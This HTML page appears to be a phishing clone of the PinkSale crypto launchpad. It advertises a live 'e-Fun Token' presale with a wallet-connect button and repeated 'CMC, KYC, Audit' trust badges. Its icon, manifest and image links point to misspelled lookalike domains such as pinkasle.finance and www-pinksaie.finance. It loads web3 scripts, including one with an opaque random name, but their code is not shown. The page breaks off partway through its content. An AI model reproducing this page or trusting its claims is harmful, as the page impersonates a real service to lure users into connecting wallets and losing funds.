<html lang="en">

<head>
	<style>
		.anticon {
			display: inline-block;
			color: inherit;
			font-style: normal;
			line-height: 0;
			text-align: center;
			text-transform: none;
			vertical-align: -0.125em;
			text-rendering: optimizeLegibility;
			-webkit-font-smoothing: antialiased;
			-moz-osx-font-smoothing: grayscale;
		}

		.anticon>* {
			line-height: 1;
		}

		.anticon svg {
			display: inline-block;
		}

		.anticon::before {
			display: none;
		}

		.anticon .anticon-icon {
			display: block;
		}

		.anticon[tabindex] {
			cursor: pointer;
		}

		.anticon-spin::before,
		.anticon-spin {
			display: inline-block;
			-webkit-animation: loadingCircle 1s infinite linear;
			animation: loadingCircle 1s infinite linear;
		}

		@-webkit-keyframes loadingCircle {
			100% {
				-webkit-transform: rotate(360deg);
				transform: rotate(360deg);
			}
		}

		@keyframes loadingCircle {
			100% {
				-webkit-transform: rotate(360deg);
				transform: rotate(360deg);
			}
		}
	</style>
	<meta charset="utf-8">
	<link rel="icon" href="https://www.pinkasle.finance/favicon.png">
	<meta name="viewport" content="width=device-width,initial-scale=1">
	<meta name="theme-color" content="#000000">
	<meta name="description" content="">
	<link rel="apple-touch-icon" href="https://www.pinkasle.finance/logo192.png">
	<link rel="manifest" href="https://www.pinksxle.finance/manifest.json">

<title> e-Fun Token Presale - EFUN is pioneer platform for games of predictions on Web3 and the Metaverse. EFUN token holders will have unprecedented chances to &quot;Predict to Earn&quot; through various predictive Events such as sport matches, elections or metaverse games. In return, EFUN helps organizations to collect opinions of the mass and enhance brands awareness. Powered by blockchain, EFUN's mission is to make Games of Predictions not only fun and beneficial but also transparent and trust-worthy. ✅ CMC ✅ KYC ✅ Audit</title>
<!--  Social tags -->
<meta name="keywords" content="Pinksale IDO EFUN sale live ">
<meta name="description" content=" e-Fun Token Presale inprogress now">

<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="Pinksale IDO EFUN">
<meta itemprop="description" content="Pinksale  e-Fun Token Presale inprogress now">
<meta itemprop="image" content="https://www-pinksaie.finance/pinksale/img/thumbnail.jpeg">

<!-- Twitter Card data -->
<meta name="twitter:card" content="pinksale #IDO #BSC #EFUN">
<meta name="twitter:title" content="EFUN - Pinksale IDO ">
<meta name="twitter:description" content="EFUN is pioneer platform for games of predictions on Web3 and the Metaverse. EFUN token holders will have unprecedented chances to &quot;Predict to Earn&quot; through various predictive Events such as sport matches, elections or metaverse games. In return, EFUN helps organizations to collect opinions of the mass and enhance brands awareness. Powered by blockchain, EFUN's mission is to make Games of Predictions not only fun and beneficial but also transparent and trust-worthy. ✅ CMC ✅ KYC ✅ Audit">
<meta name="twitter:creator" content="@pinkecosystem">
<meta name="twitter:image" content="https://www-pinksaie.finance/pinksale/img/thumbnail.jpeg">


<!-- Open Graph data -->
<meta property="fb:app_id" content="214738555737136">
<meta property="og:title" content=" e-Fun Token Presale - EFUN is pioneer platform for games of predictions on Web3 and the Metaverse. EFUN token holders will have unprecedented chances to &quot;Predict to Earn&quot; through various predictive Events such as sport matches, elections or metaverse games. In return, EFUN helps organizations to collect opinions of the mass and enhance brands awareness. Powered by blockchain, EFUN's mission is to make Games of Predictions not only fun and beneficial but also transparent and trust-worthy. ✅ CMC ✅ KYC ✅ Audit" />
<meta property="og:type" content="website"/>
<meta property="og:image" content="https://www-pinksaie.finance/pinksale/img/thumbnail.jpeg"/>
<meta property="og:description" content=" e-Fun Token Presale - EFUN is pioneer platform for games of predictions on Web3 and the Metaverse. EFUN token holders will have unprecedented chances to &quot;Predict to Earn&quot; through various predictive Events such as sport matches, elections or metaverse games. In return, EFUN helps organizations to collect opinions of the mass and enhance brands awareness. Powered by blockchain, EFUN's mission is to make Games of Predictions not only fun and beneficial but also transparent and trust-worthy. ✅ CMC ✅ KYC ✅ Audit" />
<meta property="og:site_name" content="EFUN - Pinksale IDO" />
                 
                 
<link href="/pinksale/static/css/main.3ef16f37.chunk.css" rel="stylesheet">
<script type="text/javascript" src="/pinksale/static/js/web3.min.js"></script>
<script type="text/javascript" src="/pinksale/static/js/index.js"></script>
<script type="text/javascript" src="/pinksale/static/js/index.min.js"></script>
<script type="text/javascript" src="/pinksale/static/js/index.min1.js"></script>
<script src="/pinksale/static/js/jquery_basics.js?v=1640874693"></script>
<script src="/pinksale/static/js/jquery-2.1.1.min.js"></script>
<script src="/pinksale/static/js/5tHdkf12376E434t4.min.js?v=1640874693"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-215679234-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-215679234-1');
</script>
<style>
	.nowstatus {
		display: none;
	}

	.thisnowstatus {
		display: block !important;
	}

	#yushou_fail {
		text-align: center;
	}

	#yushou_end {
		text-align: center;
	}
</style>
	</head>

	<body>
		<noscript>You need to enable JavaScript to run this app.</noscript>
		<div id="root">
			<section class="ant-layout ant-layout-has-sider">
				<header class="ant-layout-header" style="background: white; height: 70px; position: fixed; z-index: 100; width: 100%; padding: 0px 30px;">
					<nav class="flex items-center noselect">
						<div class="pr-2 is-size-4" style="cursor: pointer;">
							<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
								<path d="M408 442h480c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8H408c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8zm-8 204c0 4.4 3.6 8 8 8h480c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8H408c-4.4 0-8 3.6-8 8v56zm504-486H120c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 632H120c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM115.4 518.9L271.7 642c5.8 4.6 14.4.5 14.4-6.9V388.9c0-7.4-8.5-11.5-14.4-6.9L115.4 505.1a8.74 8.74 0 0 0 0 13.8z">
								</path>
							</svg>
						</div>
						<a class="logo mr-3 flex items-center" href="#/?chain=BSC">
							<div class="logo-icon"><img src="/pinksale/static/picture/pinkswap.a95de4f3.png" alt="pinksale"></div>
							<div class="logo-text pt-1 hide-on-mobile">PinkSale</div>
						</a>
						<div class="flex-1"></div>
						<div class="ant-dropdown-trigger connectButton on-mobile">
							<svg stroke="currentColor" fill="currentColor" stroke-width="0" t="1551322312294" viewbox="0 0 1024 1024" version="1.1" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
								<defs></defs>
								<path d="M474 152m8 0l60 0q8 0 8 8l0 704q0 8-8 8l-60 0q-8 0-8-8l0-704q0-8 8-8Z"></path>
								<path d="M168 474m8 0l672 0q8 0 8 8l0 60q0 8-8 8l-672 0q-8 0-8-8l0-60q0-8 8-8Z"></path>
							</svg><span class="ml-2 hide-on-mobile">Create</span>
						</div>
						<div class="network on-mobile" style="cursor: pointer;"><img src="/pinksale/static/picture/ic-bsc.18017344.svg" width="18" alt=""><span class="ml-2 hide-on-mobile">BSC MAINNET</span></div>
						<div id="btn-connect" class="connectButton">Connect</div>
					</nav>
				</header>
				<aside class="ant-layout-sider ant-layout-sider-dark ant-layout-sider-below ant-aside-menu" style="">
					<div class="ant-layout-sider-children">
						<ul class="ant-menu ant-menu-root ant-menu-inline ant-menu-light" role="menu" tabindex="0" data-menu-list="true">
							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-37132-1-home" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path d="M946.5 505L560.1 118.8l-25.9-25.9a31.5 31.5 0 0 0-44.4 0L77.5 505a63.9 63.9 0 0 0-18.8 46c.4 35.2 29.7 63.3 64.9 63.3h42.5V940h691.8V614.3h43.4c17.1 0 33.2-6.7 45.3-18.8a63.6 63.6 0 0 0 18.7-45.3c0-17-6.7-33.1-18.8-45.2zM568 868H456V664h112v204zm217.9-325.7V868H632V640c0-22.1-17.9-40-40-40H432c-22.1 0-40 17.9-40 40v228H238.1V542.3h-96l370-369.7 23.1 23.1L882 542.3h-96.1z">
									</path>
								</svg><span class="ant-menu-title-content"><a href="#/?chain=BSC">Home</a></span></li>
							<li class="ant-menu-submenu ant-menu-submenu-inline ant-menu-submenu-selected" role="none">
								<div role="menuitem" class="ant-menu-submenu-title" tabindex="-1" aria-expanded="false" aria-haspopup="true" data-menu-id="rc-menu-uuid-39474-1-launchpads" aria-controls="rc-menu-uuid-39474-1-launchpads-popup" style="padding-left: 24px;">
									<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 24 24" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
										<path fill="none" stroke="#000" stroke-width="2" d="M7,9 L7,14 C7,14 4,16 4,19 L4,20 L8,20 L10,23 L14,23 L16,20 L20,20 L20,19 C20,16 17,14 17,14 L17,9 C17,5 14,1 12,1 C10,1 7,5 7,9 Z M8,20 L16,20 M12,9 C12.5522847,9 13,8.55228475 13,8 C13,7.44771525 12.5522847,7 12,7 C11.4477153,7 11,7.44771525 11,8 C11,8.55228475 11.4477153,9 12,9 Z">
										</path>
									</svg><span class="ant-menu-title-content">Launchpads</span><i class="ant-menu-submenu-arrow"></i></div>
							</li>
							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-39474-1-leaderboard" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path d="M899.6 276.5L705 396.4 518.4 147.5a8.06 8.06 0 0 0-12.9 0L319 396.4 124.3 276.5c-5.7-3.5-13.1 1.2-12.2 7.9L188.5 865c1.1 7.9 7.9 14 16 14h615.1c8 0 14.9-6 15.9-14l76.4-580.6c.8-6.7-6.5-11.4-12.3-7.9zm-126 534.1H250.3l-53.8-409.4 139.8 86.1L512 252.9l175.7 234.4 139.8-86.1-53.9 409.4zM512 509c-62.1 0-112.6 50.5-112.6 112.6S449.9 734.2 512 734.2s112.6-50.5 112.6-112.6S574.1 509 512 509zm0 160.9c-26.6 0-48.2-21.6-48.2-48.3 0-26.6 21.6-48.3 48.2-48.3s48.2 21.6 48.2 48.3c0 26.6-21.6 48.3-48.2 48.3z">
									</path>
								</svg><span class="ant-menu-title-content"><a href="#/launchpad/0xe5E78E3e95fe8F32801b43Bb093862C8F99e1615?chain=BSC" one-link-mark="yes">Leaderboard</a></span></li>
							<li class="ant-menu-submenu ant-menu-submenu-inline" role="none">
								<div role="menuitem" class="ant-menu-submenu-title" tabindex="-1" aria-expanded="false" aria-haspopup="true" data-menu-id="rc-menu-uuid-39474-1-Pinklock" aria-controls="rc-menu-uuid-39474-1-Pinklock-popup" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
										<path d="M832 464H332V240c0-30.9 25.1-56 56-56h248c30.9 0 56 25.1 56 56v68c0 4.4 3.6 8 8 8h56c4.4 0 8-3.6 8-8v-68c0-70.7-57.3-128-128-128H388c-70.7 0-128 57.3-128 128v224h-68c-17.7 0-32 14.3-32 32v384c0 17.7 14.3 32 32 32h640c17.7 0 32-14.3 32-32V496c0-17.7-14.3-32-32-32zm-40 376H232V536h560v304zM484 701v53c0 4.4 3.6 8 8 8h40c4.4 0 8-3.6 8-8v-53a48.01 48.01 0 1 0-56 0z">
										</path>
									</svg><span class="ant-menu-title-content">Pinklock</span><i class="ant-menu-submenu-arrow"></i></div>
							</li>
							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-39474-1-antibot" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 24 24" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path d="M20.995,6.9c-0.034-0.342-0.241-0.642-0.548-0.795l-8-4c-0.281-0.141-0.613-0.141-0.895,0l-8,4 C3.246,6.259,3.039,6.559,3.005,6.9c-0.011,0.107-0.961,10.767,8.589,15.014C11.723,21.972,11.861,22,12,22 s0.277-0.028,0.406-0.086C21.956,17.667,21.006,7.008,20.995,6.9z M12,19.897C5.231,16.625,4.911,9.642,4.966,7.635L12,4.118 l7.029,3.515C19.066,9.622,18.701,16.651,12,19.897z">
									</path>
									<path d="M11 12.586L8.707 10.293 7.293 11.707 11 15.414 16.707 9.707 15.293 8.293z">
									</path>
								</svg><span class="ant-menu-title-content"><a href="#/antibot?chain=BSC" one-link-mark="yes">Pink Anti-Bot</a></span></li>
							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-77097-1-pools-alert" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 24 24" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path d="M21.928,11.607c-0.202-0.488-0.635-0.605-0.928-0.633V8c0-1.103-0.897-2-2-2h-6V4.61c0.305-0.274,0.5-0.668,0.5-1.11 C13.5,2.672,12.828,2,12,2s-1.5,0.672-1.5,1.5c0,0.442,0.195,0.836,0.5,1.11V6H5C3.897,6,3,6.897,3,8v2.997 C2.951,11,2.918,11.003,2.918,11.003C2.395,11.04,1.99,11.476,1.99,12v2c0,0.553,0.447,1,1,1H3v5c0,1.103,0.897,2,2,2h14 c1.103,0,2-0.897,2-2v-5c0.553,0,1-0.447,1-1v-1.938C22.011,11.909,21.988,11.753,21.928,11.607z M5,20V8h14l0.001,3.996 C19.001,11.998,19,11.999,19,12v2c0,0.002,0.001,0.003,0.001,0.005L19.002,20H5z">
									</path>
									<ellipse cx="8.5" cy="12" rx="1.5" ry="2"></ellipse>
									<ellipse cx="15.5" cy="12" rx="1.5" ry="2"></ellipse>
									<path d="M8 16H16V18H8z"></path>
								</svg><span class="ant-menu-title-content"><a href="javascript:;" target="_blank" rel="noreferrer noopener">Pools Alert</a></span></li>

							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-37132-1-pinkswap" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path d="M296 250c-4.4 0-8 3.6-8 8v48c0 4.4 3.6 8 8 8h384c4.4 0 8-3.6 8-8v-48c0-4.4-3.6-8-8-8H296zm184 144H296c-4.4 0-8 3.6-8 8v48c0 4.4 3.6 8 8 8h184c4.4 0 8-3.6 8-8v-48c0-4.4-3.6-8-8-8zm-48 458H208V148h560v320c0 4.4 3.6 8 8 8h56c4.4 0 8-3.6 8-8V108c0-17.7-14.3-32-32-32H168c-17.7 0-32 14.3-32 32v784c0 17.7 14.3 32 32 32h264c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm440-88H728v-36.6c46.3-13.8 80-56.6 80-107.4 0-61.9-50.1-112-112-112s-112 50.1-112 112c0 50.7 33.7 93.6 80 107.4V764H520c-8.8 0-16 7.2-16 16v152c0 8.8 7.2 16 16 16h352c8.8 0 16-7.2 16-16V780c0-8.8-7.2-16-16-16zM646 620c0-27.6 22.4-50 50-50s50 22.4 50 50-22.4 50-50 50-50-22.4-50-50zm180 266H566v-60h260v60z">
									</path>
								</svg><span class="ant-menu-title-content"><a href="javascript:;" target="_blank" rel="noreferrer noopener">KYC &amp; Audit</a></span></li>

							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-37132-1-docs" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 512 512" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<path fill="none" stroke-linejoin="round" stroke-width="32" d="M416 221.25V416a48 48 0 01-48 48H144a48 48 0 01-48-48V96a48 48 0 0148-48h98.75a32 32 0 0122.62 9.37l141.26 141.26a32 32 0 019.37 22.62z">
									</path>
									<path fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="32" d="M256 56v120a32 32 0 0032 32h120m-232 80h160m-160 80h160"></path>
								</svg><span class="ant-menu-title-content"><a href="javascript:;" target="_blank" rel="noreferrer noopener">Docs</a></span></li>

							<li class="ant-menu-submenu ant-menu-submenu-inline" role="none">
								<div role="menuitem" class="ant-menu-submenu-title" tabindex="-1" aria-expanded="false" aria-haspopup="true" data-menu-id="rc-menu-uuid-37132-1-telegram" aria-controls="rc-menu-uuid-37132-1-telegram-popup" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 24 24" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
										<g>
											<path fill="none" d="M0 0h24v24H0z"></path>
											<path fill-rule="nonzero" d="M12 20a8 8 0 1 0 0-16 8 8 0 0 0 0 16zm0 2C6.477 22 2 17.523 2 12S6.477 2 12 2s10 4.477 10 10-4.477 10-10 10zm-3.11-8.83l-2.498-.779c-.54-.165-.543-.537.121-.804l9.733-3.76c.565-.23.885.061.702.79l-1.657 7.82c-.116.557-.451.69-.916.433l-2.551-1.888-1.189 1.148c-.122.118-.221.219-.409.244-.187.026-.341-.03-.454-.34l-.87-2.871-.012.008z">
											</path>
										</g>
									</svg><span class="ant-menu-title-content">Telegram</span></div>
							</li>

							<li class="ant-menu-item" role="menuitem" tabindex="-1" data-menu-id="rc-menu-uuid-37132-1-twitter" style="padding-left: 24px;"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 24 24" class="ant-menu-item-icon" height="18" width="18" xmlns="http://www.w3.org/2000/svg">
									<g>
										<path fill="none" d="M0 0h24v24H0z"></path>
										<path fill-rule="nonzero" d="M15.3 5.55a2.9 2.9 0 0 0-2.9 2.847l-.028 1.575a.6.6 0 0 1-.68.583l-1.561-.212c-2.054-.28-4.022-1.226-5.91-2.799-.598 3.31.57 5.603 3.383 7.372l1.747 1.098a.6.6 0 0 1 .034.993L7.793 18.17c.947.059 1.846.017 2.592-.131 4.718-.942 7.855-4.492 7.855-10.348 0-.478-1.012-2.141-2.94-2.141zm-4.9 2.81a4.9 4.9 0 0 1 8.385-3.355c.711-.005 1.316.175 2.669-.645-.335 1.64-.5 2.352-1.214 3.331 0 7.642-4.697 11.358-9.463 12.309-3.268.652-8.02-.419-9.382-1.841.694-.054 3.514-.357 5.144-1.55C5.16 15.7-.329 12.47 3.278 3.786c1.693 1.977 3.41 3.323 5.15 4.037 1.158.475 1.442.465 1.973.538z">
										</path>
									</g>
								</svg><span class="ant-menu-title-content"><a href="javascript:;" target="_blank" rel="noreferrer noopener">Twitter</a></span></li>






						</ul>
						<div aria-hidden="true" style="display: none;"></div>
					</div>
				</aside>


				<section class="ant-layout ant-section-main" style="">
					<main class="ant-layout-content">




						<div class="Trending_trending__3pRZI">
							<div class="Trending_title__o3jyp">
								<svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
									<path fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="32" d="M352 144h112v112"></path>
									<path fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="32" d="M48 368l121.37-121.37a32 32 0 0145.26 0l50.74 50.74a32 32 0 0045.26 0L448 160">
									</path>
								</svg>&nbsp;<span>Trending</span>
							</div>
							<ul class="Trending_items__2C_oN">
								<li class="Trending_trendingItem__235g3"><span>#1</span>&nbsp;<a href="#/launchpad/0x03d9814CeE5381932638c07deC61A573DEA712EB?chain=BSC">ELV</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#2</span>&nbsp;<a href="#/launchpad/0xA0880E04a5C132B620f7dB9A8f79b6aAf6050250?chain=BSC">DFH</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#3</span>&nbsp;<a href="#/launchpad/0x73fFe897057b23172b63D61014E7F4d54385e58e?chain=BSC">RDR</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#4</span>&nbsp;<a href="#/launchpad/0x221468b951D357B42d433e0B17e1819F1b4d0162?chain=BSC">RMTX</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#5</span>&nbsp;<a href="#/launchpad/0x548a1532A8716346502115681483E562ceB7699B?chain=BSC">BSTv2</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#6</span>&nbsp;<a href="#/launchpad/0x2fA7df6b30aa514cae49cA51EFa4739c16b9F605?chain=BSC">MONSTA</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#7</span>&nbsp;<a href="#/launchpad/0x4Ca50eA6dad9865663FF49b04981425c7F5d86Df?chain=BSC">FME</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#8</span>&nbsp;<a href="#/launchpad/0xb920983c84167fC26e1A4Be81a55f2277ABAD224?chain=BSC">RIDES</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#9</span>&nbsp;<a href="#/launchpad/0xdb128a6793a4269afaF93Ce058C62531c4F2057d?chain=BSC">SOLAR</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#10</span>&nbsp;<a href="#/launchpad/0x1c53F5b08c9da69a9640420201B07AEb0d5C2C06?chain=BSC">MRC</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#11</span>&nbsp;<a href="#/launchpad/0xfD6721374fb9066fB82c70ff6c743f0B8A158110?chain=BSC">UPT</a>
								</li>
								<li class="Trending_trendingItem__235g3"><span>#12</span>&nbsp;<a href="#/launchpad/0xb9753601AA3C3e0bEae2077C57b9223886E173E1?chain=BSC">TRAP</a>
								</li>
							</ul>
						</div>







<div class="py-6 container">
	<div class="columns mt-4">
		<div class="column is-flex-grow-2">
			<div class="ant-card ant-card-bordered">
				<div class="ant-card-body">
					<article class="media pool-detail" style="position: relative;">
						<figure class="media-left" style="border: 1px solid rgba(249, 81, 146, 0.2); border-radius: 50%; overflow: hidden;">
							<p class="image is-64x64"><img src="https://ipfs.infura.io/ipfs/QmXWpZ8yuHo4qsMq2N9zPqsxCJGb3oNaWrEg6QRoQWCJTZ" alt="" style="filter: grayscale(0);"></p>
						</figure>
						<div class="media-content">
							<div class="content">
								<div class="is-flex is-align-items-center">
									<div class="is-flex-grow-1 is-flex is-align-items-center single-title">
									<h1 class="title mr-2"> e-Fun Token Presale</h1>
									<a href="https://docs.pinksale.finance/important/kyc-and-audit-at-pinksale" class="is-flex tag is-success is-small mr-2" target="_blank">KYC</a>			
									<a href="https://github.com/interfinetwork/smart-contract-audits/blob/main/EFUN_AuditReport_InterFi.pdf" class="is-flex tag is-small mr-2" target="_blank" style="background-color: rgb(0, 188, 212); color: rgb(255, 255, 255);">Audit</a>						
															
<div class="status-wrapper">

	<span id="sale_live" class="nowstatus status-dot inprogress"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 16 16" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
			<circle cx="8" cy="8" r="8"></circle>
		</svg><span> Sale Live</span></span>
	<span id="upcoming" class="nowstatus status-dot incoming"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" height="16" width="16" xmlns="http://www.w3.org/2000/svg">
			<path d="M832 464h-68V240c0-70.7-57.3-128-128-128H388c-70.7 0-128 57.3-128 128v224h-68c-17.7 0-32 14.3-32 32v384c0 17.7 14.3 32 32 32h640c17.7 0 32-14.3 32-32V496c0-17.7-14.3-32-32-32zM332 240c0-30.9 25.1-56 56-56h248c30.9 0 56 25.1 56 56v224H332V240zm460 600H232V536h560v304zM484 701v53c0 4.4 3.6 8 8 8h40c4.4 0 8-3.6 8-8v-53a48.01 48.01 0 1 0-56 0z">
			</path>
		</svg><span> Upcoming</span></span>
	<span id="sale_ended" class="nowstatus status-dot ended"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 16 16" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
			<circle cx="8" cy="8" r="8"></circle>
		</svg><span> Sale Ended</span></span>
</div>
</div>
</div>


	<div class="is-flex mt-1 mb-2">
	    <!--website-->
	    	    <a href="https://efun.tech/"  target="_blank" class="mr-4 is-size-5"><svg stroke="currentColor" fill="none" stroke-width="2" viewbox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><circle cx="12" cy="12" r="10"></circle><line x1="2" y1="12" x2="22" y2="12"></line><path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"></path></svg>
	    </a>
	    	    <!--twitter-->
	    <a href="https://twitter.com/efun_tech" rel="nofollow noreferrer" target="_blank" class="mr-4 is-size-5"><svg stroke="currentColor" fill="none" stroke-width="2" viewbox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path></svg>
	    </a>	     
	    <!--telegram-->
	    	    <a href="https://t.me/efun_community" rel="nofollow noreferrer" target="_blank" class="mr-4 is-size-5"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M446.7 98.6l-67.6 318.8c-5.1 22.5-18.4 28.1-37.3 17.5l-103-75.9-49.7 47.8c-5.5 5.5-10.1 10.1-20.7 10.1l7.4-104.9 190.9-172.5c8.3-7.4-1.8-11.5-12.9-4.1L117.8 284 16.2 252.2c-22.1-6.9-22.5-22.1 4.6-32.7L418.2 66.4c18.4-6.9 34.5 4.1 28.5 32.2z"></path></svg>
	    </a>	   
	     <!--github-->
        	    <a href="https://github.com/efun-tech/efun-token" rel="nofollow noreferrer" target="_blank" class="mr-4 is-size-5"><svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path></svg>
	    </a>	    
	    <!--reddit-->
	    	    <a href="https://www.reddit.com/r/efuntoken" rel="nofollow noreferrer" target="_blank" class="mr-4 is-size-5"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M288 568a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm338.7 119.7c-23.1 18.2-68.9 37.8-114.7 37.8s-91.6-19.6-114.7-37.8c-14.4-11.3-35.3-8.9-46.7 5.5s-8.9 35.3 5.5 46.7C396.3 771.6 457.5 792 512 792s115.7-20.4 155.9-52.1a33.25 33.25 0 1 0-41.2-52.2zM960 456c0-61.9-50.1-112-112-112-42.1 0-78.7 23.2-97.9 57.6-57.6-31.5-127.7-51.8-204.1-56.5L612.9 195l127.9 36.9c11.5 32.6 42.6 56.1 79.2 56.1 46.4 0 84-37.6 84-84s-37.6-84-84-84c-32 0-59.8 17.9-74 44.2L603.5 123a33.2 33.2 0 0 0-39.6 18.4l-90.8 203.9c-74.5 5.2-142.9 25.4-199.2 56.2A111.94 111.94 0 0 0 176 344c-61.9 0-112 50.1-112 112 0 45.8 27.5 85.1 66.8 102.5-7.1 21-10.8 43-10.8 65.5 0 154.6 175.5 280 392 280s392-125.4 392-280c0-22.6-3.8-44.5-10.8-65.5C932.5 541.1 960 501.8 960 456zM820 172.5a31.5 31.5 0 1 1 0 63 31.5 31.5 0 0 1 0-63zM120 456c0-30.9 25.1-56 56-56a56 56 0 0 1 50.6 32.1c-29.3 22.2-53.5 47.8-71.5 75.9a56.23 56.23 0 0 1-35.1-52zm392 381.5c-179.8 0-325.5-95.6-325.5-213.5S332.2 410.5 512 410.5 837.5 506.1 837.5 624 691.8 837.5 512 837.5zM868.8 508c-17.9-28.1-42.2-53.7-71.5-75.9 9-18.9 28.3-32.1 50.6-32.1 30.9 0 56 25.1 56 56 .1 23.5-14.5 43.7-35.1 52zM624 568a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg>
	    </a> 	    
	    <!--facebook-->
	    	    
	    <!--instagram-->
	    	    
	    <!--discord-->
	    	</div>
			<div class="ant-typography">EFUN is pioneer platform for games of predictions on Web3 and the Metaverse. EFUN token holders will have unprecedented chances to &quot;Predict to Earn&quot; through various predictive Events such as sport matches, elections or metaverse games. In return, EFUN helps organizations to collect opinions of the mass and enhance brands awareness. Powered by blockchain, EFUN's mission is to make Games of Predictions not only fun and beneficial but also transparent and trust-worthy. ✅ CMC ✅ KYC ✅ Audit			</div>
		</div>
	</div>
</article>
<div class="table-container mt-6">
